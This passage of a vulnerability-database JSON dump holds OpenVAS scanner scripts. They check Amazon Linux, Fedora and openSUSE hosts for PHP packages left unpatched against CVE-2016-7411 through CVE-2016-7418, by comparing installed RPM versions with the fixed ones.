script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2016-753.html\");\n script_cve_id(\"CVE-2016-7418\", \"CVE-2016-7414\", \"CVE-2016-7416\", \"CVE-2016-7417\", \"CVE-2016-7411\", \"CVE-2016-7412\", \"CVE-2016-7413\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"php56-tidy\", rpm:\"php56-tidy~5.6.26~1.128.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-bcmath\", rpm:\"php56-bcmath~5.6.26~1.128.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-fpm\", rpm:\"php56-fpm~5.6.26~1.128.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-mysqlnd\", rpm:\"php56-mysqlnd~5.6.26~1.128.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-intl\", rpm:\"php56-intl~5.6.26~1.128.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-cli\", rpm:\"php56-cli~5.6.26~1.128.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-mssql\", rpm:\"php56-mssql~5.6.26~1.128.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-enchant\", rpm:\"php56-enchant~5.6.26~1.128.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-dba\", rpm:\"php56-dba~5.6.26~1.128.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-soap\", rpm:\"php56-soap~5.6.26~1.128.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-common\", rpm:\"php56-common~5.6.26~1.128.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-mcrypt\", rpm:\"php56-mcrypt~5.6.26~1.128.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-gmp\", rpm:\"php56-gmp~5.6.26~1.128.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-process\", rpm:\"php56-process~5.6.26~1.128.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-pspell\", rpm:\"php56-pspell~5.6.26~1.128.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-mbstring\", rpm:\"php56-mbstring~5.6.26~1.128.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-pgsql\", rpm:\"php56-pgsql~5.6.26~1.128.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-debuginfo\", rpm:\"php56-debuginfo~5.6.26~1.128.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-dbg\", rpm:\"php56-dbg~5.6.26~1.128.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-imap\", rpm:\"php56-imap~5.6.26~1.128.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-odbc\", rpm:\"php56-odbc~5.6.26~1.128.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-snmp\", rpm:\"php56-snmp~5.6.26~1.128.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-ldap\", rpm:\"php56-ldap~5.6.26~1.128.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-embedded\", rpm:\"php56-embedded~5.6.26~1.128.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-xmlrpc\", rpm:\"php56-xmlrpc~5.6.26~1.128.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-devel\", rpm:\"php56-devel~5.6.26~1.128.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-pdo\", rpm:\"php56-pdo~5.6.26~1.128.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-gd\", rpm:\"php56-gd~5.6.26~1.128.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-opcache\", rpm:\"php56-opcache~5.6.26~1.128.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-recode\", rpm:\"php56-recode~5.6.26~1.128.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-xml\", rpm:\"php56-xml~5.6.26~1.128.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56\", rpm:\"php56~5.6.26~1.128.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:47", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-09-29T00:00:00", "type": "openvas", "title": "Fedora Update for php FEDORA-2016-db71b72137", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7414", "CVE-2016-7413", "CVE-2016-7416", "CVE-2016-7411", "CVE-2016-7417", "CVE-2016-7418", "CVE-2016-7412"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310809423", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809423", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php FEDORA-2016-db71b72137\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809423\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-29 06:01:14 +0200 (Thu, 29 Sep 2016)\");\n script_cve_id(\"CVE-2016-7418\", \"CVE-2016-7417\", \"CVE-2016-7416\", \"CVE-2016-7414\", \"CVE-2016-7413\", \"CVE-2016-7412\", \"CVE-2016-7411\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for php FEDORA-2016-db71b72137\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"php on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-db71b72137\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2OAOLNCQKFGIGAQBUCUAYISLRZSQCLEW\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.6.26~1.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T18:35:55", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-10-05T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for php5 (openSUSE-SU-2016:2444-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7414", "CVE-2016-7413", "CVE-2016-7416", "CVE-2016-7411", "CVE-2016-7417", "CVE-2016-7418", "CVE-2016-7412"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851402", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851402", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851402\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-10-05 05:44:46 +0200 (Wed, 05 Oct 2016)\");\n script_cve_id(\"CVE-2016-7411\", \"CVE-2016-7412\", \"CVE-2016-7413\", \"CVE-2016-7414\",\n \"CVE-2016-7416\", \"CVE-2016-7417\", \"CVE-2016-7418\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for php5 (openSUSE-SU-2016:2444-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php5'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for php5 fixes the following security issues:\n\n * CVE-2016-7411: Memory corruption when destructing deserialized object\n\n * CVE-2016-7412: Heap overflow in mysqlnd when not receiving UNSIGNED_FLAG\n in BIT field\n\n * CVE-2016-7413: Use after free in wddx_deserialize\n\n * CVE-2016-7414: Out of bounds heap read when verifying signature of zip\n phar in phar_parse_zipfile\n\n * CVE-2016-7416: Stack based buffer overflow in msgfmt_format_message\n\n * CVE-2016-7417: Missing type check when unserializing SplArray\n\n * CVE-2016-7418: Null pointer dereference in php_wddx_push_element\");\n\n script_tag(name:\"affected\", value:\"php5 on openSUSE 13.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:2444-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.2\")\n{\n\n if(!isnull(res = isrpmvuln(pkg:\"apache2-mod_php5\", rpm:\"apache2-mod_php5~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"apache2-mod_php5-debuginfo\", rpm:\"apache2-mod_php5-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5\", rpm:\"php5~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bcmath\", rpm:\"php5-bcmath~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bcmath-debuginfo\", rpm:\"php5-bcmath-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bz2\", rpm:\"php5-bz2~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bz2-debuginfo\", rpm:\"php5-bz2-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-calendar\", rpm:\"php5-calendar~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-calendar-debuginfo\", rpm:\"php5-calendar-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ctype\", rpm:\"php5-ctype~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ctype-debuginfo\", rpm:\"php5-ctype-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-curl\", rpm:\"php5-curl~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-curl-debuginfo\", rpm:\"php5-curl-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dba\", rpm:\"php5-dba~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dba-debuginfo\", rpm:\"php5-dba-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-debuginfo\", rpm:\"php5-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-debugsource\", rpm:\"php5-debugsource~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-devel\", rpm:\"php5-devel~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dom\", rpm:\"php5-dom~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dom-debuginfo\", rpm:\"php5-dom-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-enchant\", rpm:\"php5-enchant~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-enchant-debuginfo\", rpm:\"php5-enchant-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-exif\", rpm:\"php5-exif~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-exif-debuginfo\", rpm:\"php5-exif-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fastcgi\", rpm:\"php5-fastcgi~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fastcgi-debuginfo\", rpm:\"php5-fastcgi-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fileinfo\", rpm:\"php5-fileinfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fileinfo-debuginfo\", rpm:\"php5-fileinfo-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-firebird\", rpm:\"php5-firebird~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-firebird-debuginfo\", rpm:\"php5-firebird-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fpm\", rpm:\"php5-fpm~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fpm-debuginfo\", rpm:\"php5-fpm-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ftp\", rpm:\"php5-ftp~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ftp-debuginfo\", rpm:\"php5-ftp-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gd\", rpm:\"php5-gd~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gd-debuginfo\", rpm:\"php5-gd-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gettext\", rpm:\"php5-gettext~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gettext-debuginfo\", rpm:\"php5-gettext-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gmp\", rpm:\"php5-gmp~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gmp-debuginfo\", rpm:\"php5-gmp-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-iconv\", rpm:\"php5-iconv~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-iconv-debuginfo\", rpm:\"php5-iconv-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-imap\", rpm:\"php5-imap~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-imap-debuginfo\", rpm:\"php5-imap-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-intl\", rpm:\"php5-intl~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-intl-debuginfo\", rpm:\"php5-intl-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-json\", rpm:\"php5-json~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-json-debuginfo\", rpm:\"php5-json-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ldap\", rpm:\"php5-ldap~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ldap-debuginfo\", rpm:\"php5-ldap-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mbstring\", rpm:\"php5-mbstring~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mbstring-debuginfo\", rpm:\"php5-mbstring-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mcrypt\", rpm:\"php5-mcrypt~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mcrypt-debuginfo\", rpm:\"php5-mcrypt-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mssql\", rpm:\"php5-mssql~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mssql-debuginfo\", rpm:\"php5-mssql-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mysql\", rpm:\"php5-mysql~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mysql-debuginfo\", rpm:\"php5-mysql-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-odbc\", rpm:\"php5-odbc~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-odbc-debuginfo\", rpm:\"php5-odbc-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-opcache\", rpm:\"php5-opcache~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-opcache-debuginfo\", rpm:\"php5-opcache-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-openssl\", rpm:\"php5-openssl~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-openssl-debuginfo\", rpm:\"php5-openssl-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pcntl\", rpm:\"php5-pcntl~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pcntl-debuginfo\", rpm:\"php5-pcntl-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pdo\", rpm:\"php5-pdo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pdo-debuginfo\", rpm:\"php5-pdo-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pgsql\", rpm:\"php5-pgsql~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pgsql-debuginfo\", rpm:\"php5-pgsql-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-phar\", rpm:\"php5-phar~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-phar-debuginfo\", rpm:\"php5-phar-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-posix\", rpm:\"php5-posix~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-posix-debuginfo\", rpm:\"php5-posix-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pspell\", rpm:\"php5-pspell~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pspell-debuginfo\", rpm:\"php5-pspell-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-readline\", rpm:\"php5-readline~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-readline-debuginfo\", rpm:\"php5-readline-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-shmop\", rpm:\"php5-shmop~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-shmop-debuginfo\", rpm:\"php5-shmop-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-snmp\", rpm:\"php5-snmp~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-snmp-debuginfo\", rpm:\"php5-snmp-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-soap\", rpm:\"php5-soap~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-soap-debuginfo\", rpm:\"php5-soap-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sockets\", rpm:\"php5-sockets~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n 